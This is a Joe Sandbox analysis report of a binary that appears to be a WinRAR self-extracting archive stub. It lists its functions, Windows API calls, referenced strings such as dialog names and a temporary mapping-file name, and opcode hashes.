Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$AddressProc$DirectoryHandleLibraryLoadModuleSystem
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
API String ID: 751436351-2013832382
Opcode ID: 407a4525f70a022c2e68e871a7c89ca27ad472116fea8786bc8f1f6d443cd91b
Instruction ID: 599871247868c7808c559f13d0cce0c175541f7f691f591f7765c29e44d5d812
Opcode Fuzzy Hash: 407a4525f70a022c2e68e871a7c89ca27ad472116fea8786bc8f1f6d443cd91b
Instruction Fuzzy Hash: 91624371A19B4196EB11AF64F8801EDF3A4FF44B64F900236DA4D86BA5EF7CE244C790

Function 00007FF7C019ECE0 Relevance: 125.7, APIs: 61, Strings: 10, Instructions: 1421windowfilesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C018215C: GetDlgItem.USER32 ref: 00007FF7C01821AC
Part of subcall function 00007FF7C018215C: SetDlgItemTextW.USER32 ref: 00007FF7C01821C8

EndDialog.USER32 ref: 00007FF7C019EE20
SetDlgItemTextW.USER32 ref: 00007FF7C019EE70
GetMessageW.USER32 ref: 00007FF7C019EEA0
IsDialogMessageW.USER32 ref: 00007FF7C019EEB9
TranslateMessage.USER32 ref: 00007FF7C019EECB
DispatchMessageW.USER32 ref: 00007FF7C019EED9
EndDialog.USER32 ref: 00007FF7C019EF23
GetDlgItem.USER32 ref: 00007FF7C019EF60
IsDlgButtonChecked.USER32 ref: 00007FF7C019EF81
IsDlgButtonChecked.USER32 ref: 00007FF7C019EF99
SetFocus.USER32 ref: 00007FF7C019EFA2
GetLastError.KERNEL32 ref: 00007FF7C019F184
GetLastError.KERNEL32 ref: 00007FF7C019F1B5
GetTickCount.KERNEL32 ref: 00007FF7C019F1DB
GetLastError.KERNEL32 ref: 00007FF7C019F245
GetCommandLineW.KERNEL32 ref: 00007FF7C019F391
CreateFileMappingW.KERNEL32 ref: 00007FF7C019F450
MapViewOfFile.KERNEL32 ref: 00007FF7C019F473
ShellExecuteExW.SHELL32 ref: 00007FF7C019F4AB
Sleep.KERNEL32 ref: 00007FF7C019F506
UnmapViewOfFile.KERNEL32 ref: 00007FF7C019F52F
CloseHandle.KERNEL32 ref: 00007FF7C019F538
SetDlgItemTextW.USER32 ref: 00007FF7C019F82E
DialogBoxParamW.USER32 ref: 00007FF7C019FC27
EndDialog.USER32 ref: 00007FF7C019FC3F
EnableWindow.USER32 ref: 00007FF7C019FDF6
IsDlgButtonChecked.USER32 ref: 00007FF7C019FE48
WaitForInputIdle.USER32 ref: 00007FF7C019F4F3

Part of subcall function 00007FF7C018AEE0: LoadStringW.USER32 ref: 00007FF7C018AF67
Part of subcall function 00007FF7C018AEE0: LoadStringW.USER32 ref: 00007FF7C018AF80

IsDlgButtonChecked.USER32 ref: 00007FF7C019FA13
SendDlgItemMessageW.USER32 ref: 00007FF7C019FA3A
GetDlgItem.USER32 ref: 00007FF7C019FA48
IsDlgButtonChecked.USER32 ref: 00007FF7C019FA62
GetDlgItem.USER32 ref: 00007FF7C019FA9F
SetDlgItemTextW.USER32 ref: 00007FF7C019FB3C
SetDlgItemTextW.USER32 ref: 00007FF7C019FB54
SetDlgItemTextW.USER32 ref: 00007FF7C019FE71
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C019FEB3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C019FEB9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C019FEBF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C019FEC5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C019FECB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C019FED1
SendDlgItemMessageW.USER32 ref: 00007FF7C019FF99
EndDialog.USER32 ref: 00007FF7C019FFB3
GetDlgItem.USER32 ref: 00007FF7C019FFE1
SetFocus.USER32 ref: 00007FF7C019FFEA
SendDlgItemMessageW.USER32 ref: 00007FF7C01A008E
FindFirstFileW.KERNEL32 ref: 00007FF7C01A00B2
FindClose.KERNEL32 ref: 00007FF7C01A01DA
SendDlgItemMessageW.USER32 ref: 00007FF7C01A02FF

Part of subcall function 00007FF7C01812BC: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7C01813B6

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A05F9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A05FF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A0605
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A060B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A0611
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A0617

Strings

STARTDLG, xrefs: 00007FF7C019ED1A
__tmp_rar_sfx_access_check_, xrefs: 00007FF7C019F1F9
LICENSEDLG, xrefs: 00007FF7C019FC19
winrarsfxmappingfile.tmp, xrefs: 00007FF7C019F430
p, xrefs: 00007FF7C019F2FB
@, xrefs: 00007FF7C019F306
runas, xrefs: 00007FF7C019F319
%s %s, xrefs: 00007FF7C01A0229, 00007FF7C01A0496
REPLACEFILEDLG, xrefs: 00007FF7C019FF23
-el -s2 "-d%s" "-sp%s", xrefs: 00007FF7C019F2E9

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: Item$_invalid_parameter_noinfo_noreturn$Message$DialogText$ButtonChecked$FileSend$ErrorLast$CloseFindFocusLoadStringView$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleIdleInputLineMappingParamShellSleepTickTranslateUnmapWaitWindow
String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
API String ID: 2128803032-2702805183
Opcode ID: dc0dad78b3c29e677cf45a9f803212e6b54bc85ccbfd367d5b6c108a3d480acc
Instruction ID: 935260eae7fa9189c69564f5db52ac59951af41680e98b299485295daf14e4b3
Opcode Fuzzy Hash: dc0dad78b3c29e677cf45a9f803212e6b54bc85ccbfd367d5b6c108a3d480acc
Instruction Fuzzy Hash: 27D28362A1868297EA20BF24F8542BDE391AF85FA0FC04135D95D877A5DF3CF644C7A0

Function 00007FF7C01A09D8 Relevance: 66.7, APIs: 27, Strings: 10, Instructions: 1963fileCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00007FF7C01A1143
IsDlgButtonChecked.USER32 ref: 00007FF7C01A1176
IsDlgButtonChecked.USER32 ref: 00007FF7C01A11A5
SHFileOperationW.SHELL32 ref: 00007FF7C01A150B
MoveFileW.KERNEL32 ref: 00007FF7C01A169B
MoveFileExW.KERNEL32 ref: 00007FF7C01A16B9
GetTempPathW.KERNEL32 ref: 00007FF7C01A1799

Part of subcall function 00007FF7C0181B70: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0181BCB

EndDialog.USER32 ref: 00007FF7C01A1B1A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7C01A2A33
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A2A3F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A2A57
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A2A5D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A2A63
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A2A69
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A2A6F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A2A75
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A2A7B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A2A81
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A2A87
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A2A8D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A2A93
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A2A99
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A2A9F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A2AA5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A2AAB
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7C01A2AB7
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7C01A2AC3

Strings

MAX, xrefs: 00007FF7C01A25D2, 00007FF7C01A25E1
HIDE, xrefs: 00007FF7C01A2535, 00007FF7C01A2544
<br>, xrefs: 00007FF7C01A122A, 00007FF7C01A1239
@set:user, xrefs: 00007FF7C01A18E6, 00007FF7C01A18F5
lnk, xrefs: 00007FF7C01A1F1A, 00007FF7C01A1F29
MIN, xrefs: 00007FF7C01A2635, 00007FF7C01A2644
.lnk, xrefs: 00007FF7C01A1F56, 00007FF7C01A1F65
ProgramFilesDir, xrefs: 00007FF7C01A1040
.tmp, xrefs: 00007FF7C01A15D5
Software\Microsoft\Windows\CurrentVersion, xrefs: 00007FF7C01A1051

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFile$ButtonCheckedMove$DialogItemOperationPathTemp
String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
API String ID: 2285161090-3916287355
Opcode ID: da75e14aee9c57fc50695ab04f93f311b699eb501e07f1c4479dbcc53aecb119
Instruction ID: 18ba3f3f773e750a98b74056610412607f688c25028e9a4c90aa18fe28af6d22
Opcode Fuzzy Hash: da75e14aee9c57fc50695ab04f93f311b699eb501e07f1c4479dbcc53aecb119
Instruction Fuzzy Hash: B2139662B047418AEB10EF64E8402ECE7B1EB41BB8F900535DA5D97B99DF38F595C3A0

Function 00007FF7C01A400C Relevance: 47.8, APIs: 22, Strings: 5, Instructions: 539
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7C018DC4C: GetModuleHandleW.KERNEL32(?,?,?,00000000,?), ref: 00007FF7C018DEDC
Part of subcall function 00007FF7C018DC4C: GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF7C018DEF4
Part of subcall function 00007FF7C018DC4C: GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF7C018DF21

Part of subcall function 00007FF7C0187A28: GetCurrentDirectoryW.KERNEL32 ref: 00007FF7C0187A3E
Part of subcall function 00007FF7C0187A28: GetCurrentDirectoryW.KERNEL32 ref: 00007FF7C0187A78

Part of subcall function 00007FF7C019D0A8: OleInitialize.OLE32 ref: 00007FF7C019D0C2
Part of subcall function 00007FF7C019D0A8: SHGetMalloc.SHELL32 ref: 00007FF7C019D110

GetCommandLineW.KERNEL32 ref: 00007FF7C01A4226
OpenFileMappingW.KERNEL32 ref: 00007FF7C01A42BF
MapViewOfFile.KERNEL32 ref: 00007FF7C01A42E8
UnmapViewOfFile.KERNEL32 ref: 00007FF7C01A42FE
MapViewOfFile.KERNEL32 ref: 00007FF7C01A431B
UnmapViewOfFile.KERNEL32 ref: 00007FF7C01A4382
CloseHandle.KERNEL32 ref: 00007FF7C01A438B
SetEnvironmentVariableW.KERNEL32 ref: 00007FF7C01A4465
GetLocalTime.KERNEL32 ref: 00007FF7C01A4470
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7C01A44CB
SetEnvironmentVariableW.KERNEL32 ref: 00007FF7C01A44DE
GetModuleHandleW.KERNEL32 ref: 00007FF7C01A44E6
LoadIconW.USER32 ref: 00007FF7C01A4505
DialogBoxParamW.USER32 ref: 00007FF7C01A456E
Sleep.KERNEL32 ref: 00007FF7C01A459E
DeleteObject.GDI32 ref: 00007FF7C01A45C5
DeleteObject.GDI32 ref: 00007FF7C01A45D7
CloseHandle.KERNEL32 ref: 00007FF7C01A461F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A468F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A4695
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A469B

Part of subcall function 00007FF7C01A3810: SetEnvironmentVariableW.KERNEL32 ref: 00007FF7C01A3847
Part of subcall function 00007FF7C01A3810: SetEnvironmentVariableW.KERNELBASE ref: 00007FF7C01A38C0

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A4964

Strings

STARTDLG, xrefs: 00007FF7C01A455D
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00007FF7C01A44BA
sfxname, xrefs: 00007FF7C01A4453
winrarsfxmappingfile.tmp, xrefs: 00007FF7C01A42B1
sfxstime, xrefs: 00007FF7C01A44D7

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: File$EnvironmentHandleVariableView_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3767324925-3710569615
Opcode ID: 20d1775a49224c08a607c1f8c530f6c24e73cf66ba70f7089363f0871542fbde
Instruction ID: a38e384ee595b8270495d2c1e4df41d976d47996ed260b43ee55a997a5e45926
Opcode Fuzzy Hash: 20d1775a49224c08a607c1f8c530f6c24e73cf66ba70f7089363f0871542fbde
Instruction Fuzzy Hash: EE427061A1878283EA10AF25F8442BDE3A5FF85FA4FC04235DA5D86B95DF7CF15083A0

Function 00007FF7C018A8AC Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 250
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7C018A904

Part of subcall function 00007FF7C0190688: WideCharToMultiByte.KERNEL32 ref: 00007FF7C01906B9

SetDlgItemTextW.USER32 ref: 00007FF7C018A973
GetWindowRect.USER32 ref: 00007FF7C018A9AD
GetClientRect.USER32 ref: 00007FF7C018A9BB
GetWindowLongPtrW.USER32 ref: 00007FF7C018AA6C
GetWindowRect.USER32 ref: 00007FF7C018AAB2
SetDlgItemTextW.USER32 ref: 00007FF7C018AAEC
GetSystemMetrics.USER32 ref: 00007FF7C018AAF7
GetWindow.USER32 ref: 00007FF7C018AB08
GetWindowRect.USER32 ref: 00007FF7C018AB46
GetWindow.USER32 ref: 00007FF7C018AC08

Strings

CAPTION, xrefs: 00007FF7C018AACF
$%s:, xrefs: 00007FF7C018A8EF

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
String ID: $%s:$CAPTION
API String ID: 1936833115-404845831
Opcode ID: 37b82379b4c8609f857ddfdd2aaec8a8c1c03398c79129c67daa6eff71331f07
Instruction ID: 1f118f874c51785e41db3ac4ad7460e496d9a106637a146d3ed17272905c6322
Opcode Fuzzy Hash: 37b82379b4c8609f857ddfdd2aaec8a8c1c03398c79129c67daa6eff71331f07
Instruction Fuzzy Hash: 2791E332A2865287E714EF29B80466EE7A1FB84B94F855135EE4D87B58CF3CF905CB40

Function 00007FF7C019C260 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00001000,00007FF7C01A4517), ref: 00007FF7C019C279
SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF7C01A4517), ref: 00007FF7C019C295
LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF7C01A4517), ref: 00007FF7C019C2AF
LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF7C01A4517), ref: 00007FF7C019C2C1
GlobalAlloc.KERNELBASE ref: 00007FF7C019C2E2
GlobalLock.KERNEL32 ref: 00007FF7C019C2F7
GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF7C019C3A5
GlobalUnlock.KERNEL32 ref: 00007FF7C019C3C8
GlobalFree.KERNEL32 ref: 00007FF7C019C3D1

Strings

PNG, xrefs: 00007FF7C019C26B

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
String ID: PNG
API String ID: 4097654274-364855578
Opcode ID: 52838de665b1cfca97a252f31006ab2ca50257577933ff1d2f2095c083ed68dc
Instruction ID: 182c925661de56797378bb239a266ed4098acd52410ed67ae41b70a2cdd6567c
Opcode Fuzzy Hash: 52838de665b1cfca97a252f31006ab2ca50257577933ff1d2f2095c083ed68dc
Instruction Fuzzy Hash: A341E661A09A0683EA14AF16B49427DE3A1BF88FA4F844435CE4D877A4EF6CF54587A0

Function 00007FF7C018647C Relevance: 10.7, APIs: 7, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE ref: 00007FF7C01864CB
FindFirstFileW.KERNELBASE ref: 00007FF7C018651E
GetLastError.KERNEL32 ref: 00007FF7C018656F
FindNextFileW.KERNEL32 ref: 00007FF7C0186597
GetLastError.KERNEL32 ref: 00007FF7C01865A5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01866CF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01866D5

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
String ID:
API String ID: 474548282-0
Opcode ID: 9e2131fdd348412ea29fb79e3f45126eacfe5ffc882fb6d768e47b091ae13561
Instruction ID: e0c11d28ee222bffc2a6f25bf4661f678bdc09d8ef243374e405807514ba145f
Opcode Fuzzy Hash: 9e2131fdd348412ea29fb79e3f45126eacfe5ffc882fb6d768e47b091ae13561
Instruction Fuzzy Hash: 8E61B462A0864682DA10AF14F48426DE361FB84BB4F904331EAAD83BD9DF7CE644C751

Function 00007FF7C019569C Relevance: 1.6, Strings: 1, Instructions: 335COMMON

Download Yara Rule

Strings

c, xrefs: 00007FF7C01959E4

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID:
String ID: c
API String ID: 0-112844655
Opcode ID: c1e66077c649525df1862831f5d24fee890eb1fa66ff33924af5fad325382aaf
Instruction ID: f2920adff4aa2d29c03e6a1930b9ab6b61e75426cd36b9621dc9b0ac25b89ac2
Opcode Fuzzy Hash: c1e66077c649525df1862831f5d24fee890eb1fa66ff33924af5fad325382aaf
Instruction Fuzzy Hash: 98E1F833A186418BE714DF29E4402ADF7A2F788B68F904235DA5DA3B88DB3CF541CB50

Function 00007FF7C0196294 Relevance: .5, Instructions: 494COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1640375df0da50ca5502ff379811adc42cd9556f3aea87c2937a80ee4e565aef
Instruction ID: d708aa9446401f98167326ba24a91aa551ddccba236f55d9983495cb37a6a6ea
Opcode Fuzzy Hash: 1640375df0da50ca5502ff379811adc42cd9556f3aea87c2937a80ee4e565aef
Instruction Fuzzy Hash: 59228C62E08A5283EA10AF14B85417DE6AABF40F78F990135DA5ED7794DF3DF80187B0

Function 00007FF7C01A5390 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 195
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DloadAcquireSectionWriteAccess.DELAYIMP ref: 00007FF7C01A53B5

Part of subcall function 00007FF7C01A4FE8: DloadProtectSection.DELAYIMP ref: 00007FF7C01A5059

RaiseException.KERNEL32 ref: 00007FF7C01A5437
DloadReleaseSectionWriteAccess.DELAYIMP ref: 00007FF7C01A5423

Part of subcall function 00007FF7C01A52F8: DloadProtectSection.DELAYIMP ref: 00007FF7C01A5357

LoadLibraryExA.KERNELBASE ref: 00007FF7C01A54D6
GetLastError.KERNEL32 ref: 00007FF7C01A54E4
DloadReleaseSectionWriteAccess.DELAYIMP ref: 00007FF7C01A5516
RaiseException.KERNEL32 ref: 00007FF7C01A552A

Strings

H, xrefs: 00007FF7C01A5404

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: DloadSection$AccessWrite$ExceptionProtectRaiseRelease$AcquireErrorLastLibraryLoad
String ID: H
API String ID: 282135826-2852464175
Opcode ID: 1ba3ac7ad01aad9b5bbf5288423d8bdca45e536d0fe216ed71dd1fdc31554d99
Instruction ID: 76479ed73dbbed87f28dd66f51f23d0006c25fb52b4b37e33fb6099a75673f79
Opcode Fuzzy Hash: 1ba3ac7ad01aad9b5bbf5288423d8bdca45e536d0fe216ed71dd1fdc31554d99
Instruction Fuzzy Hash: 84916E62A19B518BEB04EF65E8846ACF3B1BB08BA8F844435DE0D57B54EF38F454C790

Function 00007FF7C0189CDC Relevance: 25.2, APIs: 3, Strings: 11, Instructions: 702COMMON

